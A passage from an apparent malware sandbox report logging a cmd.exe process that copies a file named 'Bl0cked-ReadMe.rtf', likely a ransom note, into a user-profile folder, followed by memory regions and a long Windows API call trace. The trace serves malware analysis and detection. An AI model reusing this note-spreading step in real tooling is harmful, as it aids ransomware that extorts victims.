"0xa54" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\Bl0cked-ReadMe.rtf\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT 
AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 31439 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 31440 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 31441 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 31442 start_va = 0x1b0000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 31443 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 31444 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 31445 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 31446 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 31447 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 31448 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" 
filename = "" Region: id = 31531 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 31532 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 31533 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 31534 start_va = 0x3d0000 end_va = 0x3dffff entry_point = 0x0 region_type = private name = "private_0x00000000003d0000" filename = "" Region: id = 31535 start_va = 0x3e0000 end_va = 0x4dffff entry_point = 0x0 region_type = private name = "private_0x00000000003e0000" filename = "" Region: id = 31536 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 31537 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 31538 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 31539 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 31540 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 
31541 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 31542 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 31543 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 31544 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 31545 start_va = 0xc0000 end_va = 0x187fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 31546 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 31547 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 31548 start_va = 0x190000 end_va = 0x196fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000190000" filename = "" Region: id = 31549 start_va = 0x1a0000 end_va = 0x1a1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 31550 start_va = 0x2b0000 end_va = 0x3b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002b0000" filename = "" Region: id = 31551 start_va = 0x3c0000 end_va = 0x3c0fff entry_point = 0x0 region_type = private name = 
"private_0x00000000003c0000" filename = "" Region: id = 31552 start_va = 0x4e0000 end_va = 0x10dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004e0000" filename = "" Region: id = 31553 start_va = 0x10e0000 end_va = 0x1242fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000010e0000" filename = "" Region: id = 31554 start_va = 0x1250000 end_va = 0x1250fff entry_point = 0x0 region_type = private name = "private_0x0000000001250000" filename = "" Thread: id = 730 os_tid = 0xac0 [0213.815] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x2afcf4 | out: lpSystemTimeAsFileTime=0x2afcf4*(dwLowDateTime=0xb440fe60, dwHighDateTime=0x1d440a9)) [0213.815] GetCurrentProcessId () returned 0xa54 [0213.815] GetCurrentThreadId () returned 0xac0 [0213.815] GetTickCount () returned 0x3be8d [0213.815] QueryPerformanceCounter (in: lpPerformanceCount=0x2afcec | out: lpPerformanceCount=0x2afcec*=27060410398) returned 1 [0213.816] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0213.816] __set_app_type (_Type=0x1) [0213.816] __p__fmode () returned 0x76b331f4 [0213.816] __p__commode () returned 0x76b331fc [0213.816] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0213.816] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0213.816] GetCurrentThreadId () returned 0xac0 [0213.816] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xac0) returned 0x38 [0213.816] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0213.816] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0213.816] SetThreadUILanguage (LangId=0x0) returned 0x409 [0213.817] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0213.817] RegOpenKeyExW (in: 
hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x2afc84 | out: phkResult=0x2afc84*=0x0) returned 0x2 [0213.817] VirtualQuery (in: lpAddress=0x2afcbb, lpBuffer=0x2afc54, dwLength=0x1c | out: lpBuffer=0x2afc54*(BaseAddress=0x2af000, AllocationBase=0x1b0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0213.817] VirtualQuery (in: lpAddress=0x1b0000, lpBuffer=0x2afc54, dwLength=0x1c | out: lpBuffer=0x2afc54*(BaseAddress=0x1b0000, AllocationBase=0x1b0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0213.817] VirtualQuery (in: lpAddress=0x1b1000, lpBuffer=0x2afc54, dwLength=0x1c | out: lpBuffer=0x2afc54*(BaseAddress=0x1b1000, AllocationBase=0x1b0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0213.817] VirtualQuery (in: lpAddress=0x1b3000, lpBuffer=0x2afc54, dwLength=0x1c | out: lpBuffer=0x2afc54*(BaseAddress=0x1b3000, AllocationBase=0x1b0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0213.817] VirtualQuery (in: lpAddress=0x2b0000, lpBuffer=0x2afc54, dwLength=0x1c | out: lpBuffer=0x2afc54*(BaseAddress=0x2b0000, AllocationBase=0x2b0000, AllocationProtect=0x2, RegionSize=0x101000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0213.817] GetConsoleOutputCP () returned 0x1b5 [0213.817] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0213.817] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0213.817] _get_osfhandle (_FileHandle=1) returned 0x7 [0213.817] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0213.817] _get_osfhandle (_FileHandle=1) returned 0x7 [0213.818] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0213.818] _get_osfhandle 
(_FileHandle=1) returned 0x7 [0213.818] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0213.818] _get_osfhandle (_FileHandle=0) returned 0x3 [0213.818] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0213.818] _get_osfhandle (_FileHandle=0) returned 0x3 [0213.818] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0213.818] GetEnvironmentStringsW () returned 0x3f0188* [0213.819] FreeEnvironmentStringsW (penv=0x3f0188) returned 1 [0213.819] GetEnvironmentStringsW () returned 0x3f0188* [0213.819] FreeEnvironmentStringsW (penv=0x3f0188) returned 1 [0213.819] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2aebf4 | out: phkResult=0x2aebf4*=0x40) returned 0x0 [0213.819] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2aebfc, lpData=0x2aec00, lpcbData=0x2aebf8*=0x1000 | out: lpType=0x2aebfc*=0x0, lpData=0x2aec00*=0xb0, lpcbData=0x2aebf8*=0x1000) returned 0x2 [0213.819] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2aebfc, lpData=0x2aec00, lpcbData=0x2aebf8*=0x1000 | out: lpType=0x2aebfc*=0x4, lpData=0x2aec00*=0x1, lpcbData=0x2aebf8*=0x4) returned 0x0 [0213.819] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2aebfc, lpData=0x2aec00, lpcbData=0x2aebf8*=0x1000 | out: lpType=0x2aebfc*=0x0, lpData=0x2aec00*=0x1, lpcbData=0x2aebf8*=0x1000) returned 0x2 [0213.819] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2aebfc, lpData=0x2aec00, lpcbData=0x2aebf8*=0x1000 | out: lpType=0x2aebfc*=0x4, lpData=0x2aec00*=0x0, lpcbData=0x2aebf8*=0x4) returned 0x0 [0213.819] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2aebfc, lpData=0x2aec00, lpcbData=0x2aebf8*=0x1000 | out: lpType=0x2aebfc*=0x4, lpData=0x2aec00*=0x40, 
lpcbData=0x2aebf8*=0x4) returned 0x0 [0213.819] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2aebfc, lpData=0x2aec00, lpcbData=0x2aebf8*=0x1000 | out: lpType=0x2aebfc*=0x4, lpData=0x2aec00*=0x40, lpcbData=0x2aebf8*=0x4) returned 0x0 [0213.819] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2aebfc, lpData=0x2aec00, lpcbData=0x2aebf8*=0x1000 | out: lpType=0x2aebfc*=0x0, lpData=0x2aec00*=0x40, lpcbData=0x2aebf8*=0x1000) returned 0x2 [0213.819] RegCloseKey (hKey=0x40) returned 0x0 [0213.819] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2aebf4 | out: phkResult=0x2aebf4*=0x40) returned 0x0 [0213.819] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2aebfc, lpData=0x2aec00, lpcbData=0x2aebf8*=0x1000 | out: lpType=0x2aebfc*=0x0, lpData=0x2aec00*=0x40, lpcbData=0x2aebf8*=0x1000) returned 0x2 [0213.819] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2aebfc, lpData=0x2aec00, lpcbData=0x2aebf8*=0x1000 | out: lpType=0x2aebfc*=0x4, lpData=0x2aec00*=0x1, lpcbData=0x2aebf8*=0x4) returned 0x0 [0213.819] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2aebfc, lpData=0x2aec00, lpcbData=0x2aebf8*=0x1000 | out: lpType=0x2aebfc*=0x0, lpData=0x2aec00*=0x1, lpcbData=0x2aebf8*=0x1000) returned 0x2 [0213.820] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2aebfc, lpData=0x2aec00, lpcbData=0x2aebf8*=0x1000 | out: lpType=0x2aebfc*=0x4, lpData=0x2aec00*=0x0, lpcbData=0x2aebf8*=0x4) returned 0x0 [0213.820] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2aebfc, lpData=0x2aec00, lpcbData=0x2aebf8*=0x1000 | out: lpType=0x2aebfc*=0x4, lpData=0x2aec00*=0x9, lpcbData=0x2aebf8*=0x4) returned 0x0 [0213.820] RegQueryValueExW (in: 
hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2aebfc, lpData=0x2aec00, lpcbData=0x2aebf8*=0x1000 | out: lpType=0x2aebfc*=0x4, lpData=0x2aec00*=0x9, lpcbData=0x2aebf8*=0x4) returned 0x0 [0213.820] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2aebfc, lpData=0x2aec00, lpcbData=0x2aebf8*=0x1000 | out: lpType=0x2aebfc*=0x0, lpData=0x2aec00*=0x9, lpcbData=0x2aebf8*=0x1000) returned 0x2 [0213.820] RegCloseKey (hKey=0x40) returned 0x0 [0213.820] time (in: timer=0x0 | out: timer=0x0) returned 0x5b8863af [0213.820] srand (_Seed=0x5b8863af) [0213.820] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\Bl0cked-ReadMe.rtf\"" [0213.820] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\Bl0cked-ReadMe.rtf\"" [0213.820] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0213.820] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x3f18e8, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0213.821] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0213.821] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0213.821] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0213.821] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0213.821] _wcsicmp (_String1="PROMPT", 
_String2="ERRORLEVEL") returned 11 [0213.821] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0213.821] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0213.821] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0213.821] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0213.821] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0213.821] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0213.821] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0213.821] GetEnvironmentStringsW () returned 0x3f22d8* [0213.821] FreeEnvironmentStringsW (penv=0x3f22d8) returned 1 [0213.821] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0213.821] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0213.821] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0213.821] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0213.821] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0213.821] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0213.822] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0213.822] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0213.822] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0213.822] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0213.822] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x2af9c0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0213.822] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x2af9c0, lpFilePart=0x2af9bc | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x2af9bc*="Desktop") returned 0x18 [0213.822] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: 
"c:\\users\\eebsym5\\desktop")) returned 0x11 [0213.822] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x2af73c | out: lpFindFileData=0x2af73c) returned 0x3f0018 [0213.822] FindClose (in: hFindFile=0x3f0018 | out: hFindFile=0x3f0018) returned 1 [0213.822] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x2af73c | out: lpFindFileData=0x2af73c) returned 0x3f0018 [0213.822] FindClose (in: hFindFile=0x3f0018 | out: hFindFile=0x3f0018) returned 1 [0213.823] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x2af73c | out: lpFindFileData=0x2af73c) returned 0x3f0018 [0213.823] FindClose (in: hFindFile=0x3f0018 | out: hFindFile=0x3f0018) returned 1 [0213.823] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0213.823] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0213.823] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0213.823] GetEnvironmentStringsW () returned 0x3f2af8* [0213.823] FreeEnvironmentStringsW (penv=0x3f2af8) returned 1 [0213.823] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0213.824] GetConsoleOutputCP () returned 0x1b5 [0213.824] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0213.824] GetUserDefaultLCID () returned 0x409 [0213.824] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0213.824] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x2afb00, cchData=128 | out: lpLCData="0") returned 2 [0213.824] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x2afb00, cchData=128 | out: lpLCData="0") returned 2 [0213.825] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x2afb00, cchData=128 | out: lpLCData="1") 
returned 2 [0213.825] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0213.825] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0213.825] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0213.825] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0213.825] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0213.825] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0213.825] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0213.825] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0213.825] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0213.825] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0213.825] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0213.826] GetConsoleTitleW (in: lpConsoleTitle=0x3e08e8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0213.826] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0213.826] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0213.826] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0213.826] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0213.827] _wcsicmp (_String1="type", _String2=")") returned 75 [0213.827] _wcsicmp (_String1="FOR", _String2="type") returned -14 [0213.827] _wcsicmp 
(_String1="FOR/?", _String2="type") returned -14 [0213.828] _wcsicmp (_String1="IF", _String2="type") returned -11 [0213.828] _wcsicmp (_String1="IF/?", _String2="type") returned -11 [0213.828] _wcsicmp (_String1="REM", _String2="type") returned -2 [0213.828] _wcsicmp (_String1="REM/?", _String2="type") returned -2 [0213.833] _get_osfhandle (_FileHandle=1) returned 0x7 [0213.833] _get_osfhandle (_FileHandle=1) returned 0x7 [0213.833] _get_osfhandle (_FileHandle=1) returned 0x7 [0213.833] GetFileType (hFile=0x7) returned 0x2 [0214.060] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0214.060] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x2af9f8 | out: lpMode=0x2af9f8) returned 1 [0214.061] _dup (_FileHandle=1) returned 3 [0214.061] _close (_FileHandle=1) returned 0 [0214.061] _wcsicmp (_String1="C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\Bl0cked-ReadMe.rtf", _String2="con") returned -53 [0214.061] CreateFileW (lpFileName="C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\default\\favori~1\\msnweb~1\\bl0cked-readme.rtf"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x2af9c8, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4c [0214.062] _open_osfhandle (_OSFileHandle=0x4c, _Flags=8) returned 1 [0214.062] GetConsoleTitleW (in: lpConsoleTitle=0x2af7f8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0214.062] _wcsicmp (_String1="type", _String2="DIR") returned 16 [0214.062] _wcsicmp (_String1="type", _String2="ERASE") returned 15 [0214.062] _wcsicmp (_String1="type", _String2="DEL") returned 16 [0214.062] _wcsicmp (_String1="type", _String2="TYPE") returned 0 [0214.063] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0214.063] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF", fInfoLevelId=0x1, lpFindFileData=0x2af35c, 
fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2af35c) returned 0x3e0e78 [0214.063] _wcsicmp (_String1="BL0CKE~1.RTF", _String2=".") returned 52 [0214.063] _wcsicmp (_String1="BL0CKE~1.RTF", _String2="..") returned 52 [0214.063] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\bl0cke~1.rtf")) returned 0x2020 [0214.064] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\bl0cked-readme.rtf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x2ae268, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x54 [0214.064] _open_osfhandle (_OSFileHandle=0x54, _Flags=8) returned 4 [0214.064] _get_osfhandle (_FileHandle=4) returned 0x54 [0214.064] GetFileType (hFile=0x54) returned 0x1 [0214.064] _get_osfhandle (_FileHandle=4) returned 0x54 [0214.064] GetFileSize (in: hFile=0x54, lpFileSizeHigh=0x2ae2c0 | out: lpFileSizeHigh=0x2ae2c0*=0x0) returned 0x1632 [0214.064] _get_osfhandle (_FileHandle=4) returned 0x54 [0214.064] SetFilePointer (in: hFile=0x54, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0214.064] _get_osfhandle (_FileHandle=4) returned 0x54 [0214.064] ReadFile (in: hFile=0x54, lpBuffer=0x2af0f8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae2e8, lpOverlapped=0x0 | out: lpBuffer=0x2af0f8*, lpNumberOfBytesRead=0x2ae2e8*=0x200, lpOverlapped=0x0) returned 1 [0214.064] _get_osfhandle (_FileHandle=1) returned 0x4c [0214.064] GetFileType (hFile=0x4c) returned 0x1 